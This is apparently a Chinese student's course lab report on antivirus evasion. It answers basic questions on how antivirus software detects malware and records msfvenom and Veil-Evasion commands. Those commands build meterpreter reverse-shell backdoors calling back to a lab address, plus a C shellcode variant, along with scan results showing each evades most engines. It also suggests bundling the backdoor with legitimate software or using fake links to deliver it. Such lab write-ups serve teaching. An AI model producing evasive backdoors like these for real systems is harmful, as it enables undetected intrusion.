20169210 2016-2017-2《网络攻防实践》第十四周免杀技术

免杀技术

一、基础问题回答

（1）杀软是如何检测出恶意代码的？

• 基于特征码的检测

恶意代码常常具有明显的特征码也就是一段数据，杀软检测到具有该特征码的程序就当作检测到了恶意代码。

• 启发式恶意软件检测

• 基于行为的恶意软件检测

如果一个程序的行为是带有恶意的行为，那么这个程序也会被认为是恶意代码。

（2）免杀是做什么？

使用一些方法使得恶意程序不被杀软和防火墙发现，避免被查杀。

（3）免杀的基本方法有哪些？

• 改变特征码

对恶意代码进行加壳、用其他语言或编译器进行再编译，利用shellcode进行编码

• 改变攻击行为

基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码

实践总结与体会

此次实验使我深入了解了病毒或者是木马的查杀原理，通过对免杀技术的了解，意识到电脑并不是装上了杀毒软件就万无一失了，很多病毒是查杀不到的，但是装上几个杀毒软件之后电脑就运行不起来了，所以最重要的还是我们的防范意识要强，并且每周更新一个病毒库。

离实战还缺些什么技术或步骤？

在实际环境中，我们的后门程序需要一些其他的手段才能移植到靶机的电脑上，例如可以捆绑到正规软件上，又或者是做一个假的链接让靶机的使用者点击下载操作。

实践过程记录

1.使用msf编码器直接生成一个后门程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.69.126 LPORT=5329 -f exe > 5329met-encoded.exe

文件传送到windows以后被查杀，找回后上传到virscan扫描，有20/39款杀软鉴定它为恶意代码
检测过程如图所示：

2.使用veil-evasion免杀平台

kali原本没有veil-evasion ，所以需要先安装

sudo ape-get install veil-evasion

menu下依次输入语言、ip、端口号以及文件名等

use python/meterpreter/rev_tcp
set LHOST 172.16.69.126
generate
5329
1

将生成的可执行文件传送到windows，传送时windows杀软没有检测到文件为恶意代码并杀死它

在windows文件中找到恶意代码（5329.exe），上传到virscan扫描发现有1/39款杀软识别出它是恶意代码

3.shellcode编程

在kali终端下生成一个c格式的十六进制数组，Ip为kali的

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.69.126 LPORT=443 -f c

按照实验教程模版在windows VS中编写一个c语言的shellcode代码，并将kali中生成的带有kali ip的十六进制数组加入c代码的编写中，
kali中运行msf监听

将c代码上传到virscan扫描，结果显示5/39的杀毒软件鉴定为恶意代码，并且提出了警告。